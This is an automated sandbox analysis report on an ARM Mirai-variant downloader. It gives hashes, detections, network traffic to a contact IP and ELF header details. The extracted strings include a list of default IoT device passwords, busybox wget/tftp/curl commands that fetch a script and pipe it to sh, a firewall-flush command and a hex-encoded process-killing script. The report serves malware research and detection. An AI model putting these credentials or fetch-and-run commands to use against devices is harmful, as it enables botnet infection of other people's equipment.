Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
dlr.arm7.elf

Overview

General Information

Sample name:dlr.arm7.elf
Analysis ID:1582148
MD5:967f026a3792018274ae7e38acee0b3e
SHA1:ab72c48d576a716bcbf29ba8ef5d0c5dea1e4e7f
SHA256:e78dc7c3a6e28b9e2744371e26ee8bb283f9269abde942a1f0bffeb547e8c655
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:60
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Yara detected Mirai
Drops invisible ELF files
Creates hidden files and/or directories
Executes the "rm" command used to delete files or directories
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1582148
Start date and time:2024-12-30 03:00:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 9s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:dlr.arm7.elf
Detection:MAL
Classification:mal60.troj.evad.linELF@0/1@0/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:/tmp/dlr.arm7.elf
PID:6260
Exit Code:5
Exit Code Info:
Killed:False
Standard Output:
NIGGY
RAY
Standard Error:
  • system is lnxubuntu20
  • dlr.arm7.elf (PID: 6260, Parent: 6181, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/dlr.arm7.elf
  • dash New Fork (PID: 6267, Parent: 4331)
  • rm (PID: 6267, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuO
  • dash New Fork (PID: 6268, Parent: 4331)
  • rm (PID: 6268, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuO
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
/tmp/.ffdfdJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: dlr.arm7.elfVirustotal: Detection: 29%Perma Link
    Source: dlr.arm7.elfReversingLabs: Detection: 47%
    Source: .ffdfd.12.drString: ash|login|wget|curl|tftp|ntpdate|ftp
    Source: .ffdfd.12.drString: /proc//cmdline/mapsselfrebootftpwgetmountunmount-shashtftpcurl/bin/login/exe|ash|login|wget|curl|tftp|ntpdate|ftp/proc/mounts (deleted)/proc/%s/statusPPid:/fdsocket|proc/usr/bin/usr/sbin/system/mnt/mtd/app/org/z/zbin/home/app/dvr/bin/duksan/userfs/mnt/app/usr/etc/dvr/main/usr/local/var/bin/tmp/sqfs/z/bin/dvr/mnt/mtd/zconf/gm/bin/home/process/var/challenge/var/Sofia/usr/lib/lib/systemd//usr/lib/systemd/system/system/bin//mnt//home/helper/home/davinci/usr/libexec//sbin//bin/
    Source: .ffdfd.12.drString: rootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetcisco/bin/busyboxenableshellshlinuxshellping ;sh/bin/busybox hostname FICORAiptables -F/bin/busybox echo > .ri && sh .ri && cd rm -rf dvrEncoder rtspd dvrUpdater dvrDecoder dvrRecorder ptzcontrol .ntpfsh .ntpf/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | sh/bin/busybox chmod +x upnp; ./upnp; ./.ffdfd selfrep.echowEek/var//var/run//var/tmp//dev//dev/shm//etc//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63\x2F\x2A\3B""\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A\x20\x20\x23\x20\x53\x6B\x69\x70\x20\x6E\x6F\x6E\x2D""\x6E\x75\x6D\x65\x72\x69\x63\x20\x64\x69\x72\x65\x63\x74\x6F\x72\x69\x65\x73\x0A\x20\x20\x69\x66\x20\x21\x20\x5B\x20\x22\x24\x70\x69\x64\x22\x20\x2D\x65""\x71\x20\x22\x24\x70\x69\x64\x22\x20\x5D\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x63\x6F\x6E\x74""\x69\x6E\x75\x65\x0A\x20\x20\x66\x69\x0A\x0A\x20\x20\x23\x20\x47\x65\x74\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x6F\x66""\x20\x74\x68\x65\x20\x70\x72\x6F\x63\x65\x73\x73\x0A\x20\x20\x63\x6D\x64\x6C\x69\x6E\x65\x3D\x24\x28\x74\x72\x20\x27\x5C\x30\x27\x20\x27\x20\x27\x20\x3C""\x20\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x63\x6D\x64\x6C\x69\x6E\x65\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x23""\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x63\x6F\x6D\x6D\x61\x6E\x64\x20\x6C\x69\x6E\x65\x20\x63\x6F\x6E\x74\x61\x69\x6E\x73\x20\x22\x64""\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x0A\x20\x20\x69\x66\x20\x65\x63\x68\x6F\x20\x22\x24\x63\x6D\x64\x6C\x69\x6E\x65\x22\x20\x7C\x20\x67\x72\x65\x70\x20\x2D""\x71\x20\x22\x64\x76\x72\x48\x65\x6C\x70\x65\x72\x22\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64""\x22\x0A\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
    Source: global trafficHTTP traffic detected: GET /arm7 HTTP/1.0
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 103.149.87.18
    Source: unknownTCP traffic detected without corresponding DNS query: 34.249.145.219
    Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
    Source: global trafficHTTP traffic detected: GET /arm7 HTTP/1.0
    Source: .ffdfd.12.drString found in binary or memory: http:///curl.sh
    Source: .ffdfd.12.drString found in binary or memory: http:///wget.sh
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39256
    Source: unknownNetwork traffic detected: HTTP traffic on port 39256 -> 443
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: classification engineClassification label: mal60.troj.evad.linELF@0/1@0/0
    Source: /tmp/dlr.arm7.elf (PID: 6260)File: /tmp/.ffdfdJump to behavior
    Source: /usr/bin/dash (PID: 6267)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuOJump to behavior
    Source: /usr/bin/dash (PID: 6268)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.xLXIGDm9Dk /tmp/tmp.pKhlYb5CMx /tmp/tmp.8J7qwhKIuOJump to behavior
    Source: /tmp/dlr.arm7.elf (PID: 6260)File written: /tmp/.ffdfdJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: /tmp/dlr.arm7.elf (PID: 6260)ELF file: /tmp/.ffdfdJump to dropped file
    Source: /tmp/dlr.arm7.elf (PID: 6260)Queries kernel information via 'uname': Jump to behavior
    Source: dlr.arm7.elf, 6260.1.000055e04f2bb000.000055e04f3e9000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
    Source: dlr.arm7.elf, 6260.1.00007ffda624d000.00007ffda626e000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/dlr.arm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/dlr.arm7.elf
    Source: dlr.arm7.elf, 6260.1.000055e04f2bb000.000055e04f3e9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
    Source: dlr.arm7.elf, 6260.1.00007ffda624d000.00007ffda626e000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: /tmp/.ffdfd, type: DROPPED

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: /tmp/.ffdfd, type: DROPPED
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Scripting
    Path Interception11
    Hidden Files and Directories
    OS Credential Dumping11
    Security Software Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    File Deletion
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582148 Sample: dlr.arm7.elf Startdate: 30/12/2024 Architecture: LINUX Score: 60 16 109.202.202.202, 80 INIT7CH Switzerland 2->16 18 103.149.87.18, 41112, 80 CITYNET-AS-APCityNetCommunicationCoLtdKH unknown 2->18 20 2 other IPs or domains 2->20 22 Multi AV Scanner detection for submitted file 2->22 24 Yara detected Mirai 2->24 6 dlr.arm7.elf 2->6         started        10 dash rm 2->10         started        12 dash rm 2->12         started        signatures3 process4 file5 14 /tmp/.ffdfd, ELF 6->14 dropped 26 Drops invisible ELF files 6->26 signatures6

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    dlr.arm7.elf29%VirustotalBrowse
    dlr.arm7.elf47%ReversingLabsLinux.Backdoor.Mirai
    SourceDetectionScannerLabelLink
    /tmp/.ffdfd70%ReversingLabsLinux.Trojan.Mirai
    /tmp/.ffdfd59%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    No contacted domains info
    NameSourceMaliciousAntivirus DetectionReputation
    http:///wget.sh.ffdfd.12.drfalse
      high
      http:///curl.sh.ffdfd.12.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        34.249.145.219
        unknownUnited States
        16509AMAZON-02USfalse
        103.149.87.18
        unknownunknown
        138030CITYNET-AS-APCityNetCommunicationCoLtdKHfalse
        109.202.202.202
        unknownSwitzerland
        13030INIT7CHfalse
        91.189.91.42
        unknownUnited Kingdom
        41231CANONICAL-ASGBfalse
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        34.249.145.219udpmpsl.elfGet hashmaliciousUnknownBrowse
          bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
            main_mpsl.elfGet hashmaliciousMiraiBrowse
              ub8ehJSePAfc9FYqZIT6.arm7.elfGet hashmaliciousMiraiBrowse
                telnet.arm7.elfGet hashmaliciousUnknownBrowse
                  main_arm7.elfGet hashmaliciousMiraiBrowse
                    boatnet.spc.elfGet hashmaliciousMiraiBrowse
                      arm6.elfGet hashmaliciousMirai, MoobotBrowse
                        spc.elfGet hashmaliciousMirai, MoobotBrowse
                          Space.x86.elfGet hashmaliciousUnknownBrowse
                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                            91.189.91.42.Sm68k.elfGet hashmaliciousUnknownBrowse
                              m68k.elfGet hashmaliciousUnknownBrowse
                                main_mpsl.elfGet hashmaliciousMiraiBrowse
                                  .Sx86_64.elfGet hashmaliciousUnknownBrowse
                                    udpmpsl.elfGet hashmaliciousUnknownBrowse
                                      .Sarm.elfGet hashmaliciousUnknownBrowse
                                        dc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          rebirth.i686.elfGet hashmaliciousGafgytBrowse
                                            .Sx86.elfGet hashmaliciousUnknownBrowse
                                              bin.sh.elfGet hashmaliciousMiraiBrowse
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                CANONICAL-ASGB.Sm68k.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 91.189.91.42
                                                .Sx86_64.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                x86.elfGet hashmaliciousUnknownBrowse
                                                • 185.125.190.26
                                                udpmpsl.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                .Sarm.elfGet hashmaliciousUnknownBrowse
                                                • 91.189.91.42
                                                dc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 91.189.91.42
                                                rebirth.i686.elfGet hashmaliciousGafgytBrowse
                                                • 91.189.91.42
                                                dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                • 185.125.190.26
                                                INIT7CH.Sm68k.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                m68k.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                main_mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                .Sx86_64.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                udpmpsl.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                .Sarm.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                dc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 109.202.202.202
                                                rebirth.i686.elfGet hashmaliciousGafgytBrowse
                                                • 109.202.202.202
                                                .Sx86.elfGet hashmaliciousUnknownBrowse
                                                • 109.202.202.202
                                                bin.sh.elfGet hashmaliciousMiraiBrowse
                                                • 109.202.202.202
                                                AMAZON-02USudpmpsl.elfGet hashmaliciousUnknownBrowse
                                                • 34.249.145.219
                                                .Sx86.elfGet hashmaliciousUnknownBrowse
                                                • 54.171.230.55
                                                loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                • 108.146.236.114
                                                loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                • 18.167.172.156
                                                loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                • 13.221.153.208
                                                loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                • 13.245.236.62
                                                loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 44.229.110.130
                                                loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                • 63.34.74.29
                                                spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 35.152.59.44
                                                arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 34.211.99.21
                                                No context
                                                No context
                                                Process:/tmp/dlr.arm7.elf
                                                File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                Category:dropped
                                                Size (bytes):120528
                                                Entropy (8bit):6.1156478438551405
                                                Encrypted:false
                                                SSDEEP:3072:ToziZaHYt7gcZZshYYx3xb/KfraZ/X5SZ8wD/Any/ufIR6nW:TpZAYtDYDKDaZ/X5SZ82/7yG
                                                MD5:AA6B3767F8608F811051BB8A53254943
                                                SHA1:F57A7E0491B55F5475BA221DC4084A6C0918CDCF
                                                SHA-256:C53C01B3B420FF489699B4721B51E5C9321043BCA83003C6B653F8B09CBDAF3F
                                                SHA-512:04A4FB85F445CE3647C3A6A146EEC823C44FBD249EE220A74841D49BD2DDBE92B5F3E8F28CF923DF3D8F89CA600133F8CE5E6B197EC19B2D589954ACB156A7AA
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /tmp/.ffdfd, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 70%
                                                • Antivirus: Virustotal, Detection: 59%, Browse
                                                Reputation:low
                                                Preview:.ELF..............(.........4...x.......4. ...(........p0...0N..0N..................................H...H................................t..........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../...............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0..R..9K..............A-..@P.00...P...p...@...0..'.....R..0...0...?.......@d......`..........1....Q.W0..0....0...0...0..........G1...@P..`........X.-0...0...`............F..@....... ...0P..0... `.......\...A......A..../...-.\.M......3....P..........0...:....S.........\......../..E-..M...@...P....... ......?... ..........?...p.......3..K...0..L...l.......6@...0...`..l.......1@... ......................?............P."....@...P.......p...`...... ...U....0... ..............0......l....@...........?...........P.............. ...:...`..&2....p.
                                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):4.8028411093754775
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:dlr.arm7.elf
                                                File size:1'488 bytes
                                                MD5:967f026a3792018274ae7e38acee0b3e
                                                SHA1:ab72c48d576a716bcbf29ba8ef5d0c5dea1e4e7f
                                                SHA256:e78dc7c3a6e28b9e2744371e26ee8bb283f9269abde942a1f0bffeb547e8c655
                                                SHA512:28e20cd8c720a28bed17712c1d5249329fc8512eac9d53231d1eade9854a716571ea44b75eee23e0569bf1e9e337210b43ee41b0bd6aa877ca6c2baf18a2fb6c
                                                SSDEEP:24:uTcRKGpa7Urz/jlffMXK1hZVev3gRGaJ9ixBBuLl1E9gjSq:uARKGpa7UrLZfbs+JCBuoZq
                                                TLSH:F231FEA5A7D09DBDC4F451BE9E5B0310B3799F00E0C77222870C63696C2AE3C9D27046
                                                File Content Preview:.ELF..............(.........4...........4. ...(.....................`...`...............`...`...`.......................`...`...`...................Q.td.........................................8...<...4...........(.."...#...../...-.......M................

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, little endian
                                                Version:1 (current)
                                                Machine:ARM
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x83ac
                                                Flags:0x4000002
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:4
                                                Section Header Offset:1208
                                                Section Header Size:40
                                                Number of Section Headers:7
                                                Header String Table Index:6
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .textPROGBITS0x80c00xc00x3600x00x6AX0016
                                                .rodataPROGBITS0x84200x4200x400x10x32AMS004
                                                .tbssNOBITS0x104600x4600x80x00x403WAT004
                                                .gotPROGBITS0x104600x4600x100x40x3WA004
                                                .ARM.attributesARM_ATTRIBUTES0x00x4700x140x00x0001
                                                .shstrtabSTRTAB0x00x4840x340x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x80000x80000x4600x4605.20860x5R E0x8000.text .rodata
                                                LOAD0x4600x104600x104600x100x100.33730x6RW 0x8000.tbss .got
                                                TLS0x4600x104600x104600x00x80.00000x4R 0x4.tbss
                                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                TimestampSource PortDest PortSource IPDest IP
                                                Dec 30, 2024 03:01:33.419553041 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:33.424386978 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:33.424441099 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:33.425852060 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:33.430565119 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:33.568206072 CET43928443192.168.2.2391.189.91.42
                                                Dec 30, 2024 03:01:34.324152946 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324179888 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324191093 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324210882 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324222088 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324232101 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324243069 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324254990 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324265003 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324276924 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.324526072 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.324526072 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.324526072 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.324526072 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.329432964 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.329466105 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.329493046 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.329493046 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.329556942 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.329586983 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563828945 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563849926 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563862085 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563874006 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563883066 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563894987 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563918114 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563919067 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563919067 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563919067 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563920021 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563930035 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.563971996 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.563977957 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564094067 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564106941 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564119101 CET8041112103.149.87.18192.168.2.23
                                                Dec 30, 2024 03:01:34.564126015 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564126968 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564138889 CET4111280192.168.2.23103.149.87.18
                                                Dec 30, 2024 03:01:34.564599037 CET8041112103.149.87.18192.168.2.23
